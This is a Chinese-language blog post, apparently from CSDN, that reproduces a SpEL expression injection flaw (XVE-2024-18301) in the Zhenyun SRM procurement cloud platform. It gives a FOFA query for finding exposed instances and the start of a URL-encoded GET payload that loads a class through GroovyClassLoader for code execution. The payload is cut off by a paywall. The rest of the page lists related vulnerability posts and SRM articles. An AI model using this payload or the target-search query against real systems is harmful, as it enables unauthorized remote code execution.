甄云SRM云平台 SpEL表达式注入漏洞复现(XVE-2024-18301)

已于 2024-09-06 16:07:16 修改
阅读量806 收藏
点赞数
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-08-14 09:48:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/141182186
版权

0x01 产品简介

甄云SRM云平台是由上海甄云信息科技有限公司开发的一款专为企业采购数字化转型而设计的云平台。该产品以企业采购管理为核心,通过数字化手段提升采购效率,降低采购成本,增强供应链的透明度和合规性。致力于为企业提供从需求到寻源、订单到对账开票的全采购流程管理,全面覆盖企业全品类采购。该平台不仅适用于中大型企业,也专为中小企业设计了SaaS产品,满足不同规模企业的采购管理需求。

0x02 漏洞概述

甄云SRM平台存在SpEL表达式注入漏洞,该漏洞源于系统能够解析/oauth/public/后路径中的SpEL表达式,导致攻击者能够利用该漏洞执行任意代码。

0x03 复现环境

FOFA:body="/oauth/static/default/css/footer.css"

0x04 漏洞复现

Exp

GET /oauth/public/%5f%5f%24%7bT(groovy.lang.GroovyClassLoader).newInstance().defineClass('CALC',T(com.sun.org.apache.xml.internal.security.utils.Base64
了解本专栏 订阅专栏 解锁全文 超级会员免费看
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
0xSec
07-14 2848
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php、getlist、getlistdata等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【产品经理修炼之道】-SaaS 过度研发综合症
xiaoli8748的专栏
10-04 974
在资本驱动、需求变化、认知不足等内外部因素的作用下,国内许多 SaaS 厂商,在过去几年出现了“过度研发综合症”:这既是过往一个非常昂贵的代价,也是如今“越做越难”的一个深层原因。当资本故事无以为继,中国 SaaS 在产研上也应当告别以往的“大手笔”,走向精细化。管好需求,守住边界,算好账。产品做对了,组织、销售、运营、实施、客户成功等,也会更加简单高效,一切都对了。
SRM系统有什么用?有哪些好用的SRM管理系统?
BeWorkingMan的博客
01-29 1621
无需编写代码,即可自主搭建满足业务需求的系统,以适应企业采购业务的灵活性和多样性。在使用传统SRM平台时,企业可能需要调整自身的采购流程来适应软件的固有规则;然而,简道云SRM允许企业完全按照自身的采购流程来构建功能,实现业务与技术的无缝对接。此外,简道云SRM的。
制造业为何需要SRM系统?SRM系统能带来什么价值?
最新发布
JZC_xiaozhong的博客
02-07 1130
SRM(供应商关系管理)系统是一种专门用于优化企业与供应商之间关系的信息化管理工具。它通过整合企业内部的采购流程和供应商信息,实现对供应商的全生命周期管理,包括供应商的资质审核、分类管理、绩效评估、采购订单管理、合同管理等。SRM系统不仅能够帮助企业优化采购流程,降低采购成本,还能通过与供应商的紧密协作,提升供应链的透明度和响应速度,从而增强企业的整体竞争力。甄云SRM产品全景图,来源:甄云SRM官网制造业企业引入SRM系统是应对复杂供应链管理需求、提升企业竞争力的必然选择。
漏洞复现】Spring Cloud Function SPEL表达式注入漏洞(cve-2022-22963)
Hi~ 土拨鼠
04-01 1661
文章目录1、复现环境2、构造POC3、在vps上开启监听4、执行POC,成功反弹shell 1、复现环境 本文是在vulfocus在线环境进行的复现:http://vulfocus.io/ 2、构造POC 由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析 由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理 spring.cloud.function.routing-ex
关于Spring Cloud 表达式注入漏洞——分析复现
无问社区的博客
09-12 506
漏洞是由于Spring Cloud Function中RoutingFunction类的 apply方法将请求头中spring.cloud.function.routing-expression传入的参数值作为SPEL表达式进行处理,攻击者可以通过构造恶意的语句来实现SPEL表达式注入漏洞。利用编译好的环境进行本地复现,下载地址:https://github.com/Pizz33/Spring-Cloud-Function-SpEL。执行POC后,vps上收到了弹回的shell。vps上进行端口监听。
SPEL表达式注入漏洞
weixin_50217210的博客
03-11 2369
SPEL,全称为Spring表达式语言,是一个由 Spring 框架提供的表达式语言。它是一种基于字符串的表达式语言,可以在运行时对对象进行查询和操作。SpEL 支持在XML和注解配置中使用,它可以在Spring框架的各种组件中使用,如Spring MVC 控制器、Spring Security 安全框架、Spring Data 数据访问框架等。它可以方便地访问对象的属性、调用对象的方法、进行数学运算、逻辑运算、正则表达式匹配等操作。
浅入深SpEL表达式注入漏洞总结
snowlyzz的博客
02-07 1932
SpEL基础篇
常见的框架漏洞~~
网安小白
08-07 984
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
​专注制造业云SRM,携客云“多快好省”助力智能制造
weixin_57755580的博客
04-29 2876
作者:陈杨 出自:中国软件网 自2010年以来,我国制造业已连续12年位居世界第一。根据工信部最新数据:2012年到2021年,中国工业增加值由20.9万亿元增长到37.3万亿元,其中制造业增加值由16.98万亿元增长到31.4万亿元,占GDP比重达27.4%。 可以说,我国是当之无愧的制造大国,但一直面临着“大而不强”的困境。所以早在2015年《政府工作报告》便提出《中国制造2025》,要求推动我国到2025年基本实现工业化,迈入制造强国行列。 在疫情、新基建、“十四五”,规划等因素及...
选型指南:盘点2024年热度较高的SRM系统
BeWorkingMan的博客
08-26 1123
如同企业供应链管理的 “智慧大脑”,涵盖供应商全生命周期管理,从寻源到合作结束的各个环节。企业购入,就像为供应链管理安装了强大引擎。一方面,。另一方面,,让企业在激烈的市场竞争中如虎添翼,稳步前行,为企业的持续发展提供坚实保障。今天我就来给大家盘点下,同时,文末还会解答一些常见的问题,帮助你能在选型和实施过程中做出正确决策。:依托零代码开发工具,操作简便易上手,可根据企业实际需求快速搭建个性化的 SRM 系统,功能更新及时,能满足不同发展阶段企业的采购管理需求。
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 1687
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
Spring Cloud Function SPEL表达式注入漏洞分析(CVE-2022-22963)
panda的博客
04-05 2504
影响范围: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 项目简介: Spring Cloud Function 是一个具有以下高级目标的项目: 通过函数促进业务逻辑的实现,可以将函数设置为HTTP端点。 将业务逻辑的开发生命周期与任何特定的运行时目标分离,以便相同的代码可以作为 Web 端点、流处理器或任务运行。 支持跨无服务器提供商的统一编程模型,以及独立运行(本地或在 PaaS 中)的能力。 在无服务器提供程序上启用 Spring Boo
Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计
m0_63174618的博客
04-07 982
也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**
一文详解SpEL表达式注入漏洞
华为云官方博客
02-21 1303
本文介绍了SpEL表达式以及常见的SpEL注入攻击,详细地介绍了部分漏洞攻击实例以及常用的漏洞检测与防御手段。
[Java安全]Spring SPEL注入总结&回显技术
2301_80115097的博客
10-24 2701
SpEL表达式中,变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现;在表达式中使用”#variableName”来引用;#this:使用当前正在计算的上下文;#root:引用容器的root对象;@something:引用Bean。
HW漏洞威胁情报第一天|HW情报
weixin_43167326的博客
07-24 532
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3453
概念: 什么是spring cloud? Spring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
Spring Cloud Function SpEL表达式注入漏洞复现
04-06 4045
漏洞描述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 影响版本 Spring Cloud Function SPEL表达式注入漏洞影响范围: 3 <= spring-cloud-function-context <= 3.2.
2022国产SRM供应商管理系统合集
喜欢打酱油的老鸟
07-14 4151
导读:SRM全称为Supplier Relationship Management,即供应商关系管理系统,是一个全方位的企业管理应用软件。SRM供应商关系管理系统功能包括信息管控全面、数据汇总、协同办公及完善供应链风险控制等。正如当今流行的CRM系统是用来改善企业与客户的关系一样,SRM系统可以用来改善企业与供应链上游供应商的关系。它是一种致力于实现企业与供应商建立维持长久紧密伙伴关系的软件技术和解决方案。软服之家数据研究中心根据平台数据为大家整理了2022最新SRM供应商管理系统合集,软件排名不分先后,有
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值